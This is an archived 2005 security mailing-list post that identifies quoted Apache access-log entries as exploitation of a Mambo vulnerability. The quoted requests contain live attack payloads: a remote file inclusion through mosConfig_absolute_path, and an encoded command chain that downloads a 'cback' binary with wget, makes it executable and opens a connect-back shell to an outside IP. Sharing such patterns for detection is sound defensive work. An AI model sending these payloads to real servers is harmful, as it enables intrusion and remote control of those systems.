[Dshield] A Couple of New Apache Hack Patterns

bugtraq@cgisecurity.net bugtraq at cgisecurity.net
Wed Dec 14 19:45:37 GMT 2005


This appears to be the recent mambo vulnerability.

- zeno
http://www.cgisecurity.com/ Website Security news, and more!
http://www.cgisecurity.com/index.rss Website Security RSS Feed 

> 
> . . . new for me anyway.
> 
> 1. index2.php | index.php
> 
> /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;.cback%20217.160.242.90%208080;echo%20YYY;echo|HTTP/1.1"
> 302 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT5.1;)"
> 
> or;
> 
> /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.16.85.15/cmd.gif?&cmd=cd%20/tmp;wget%20216.103.82.214/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo|
> HTTP/1.1" 301 562 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1;)"


More information about the list mailing list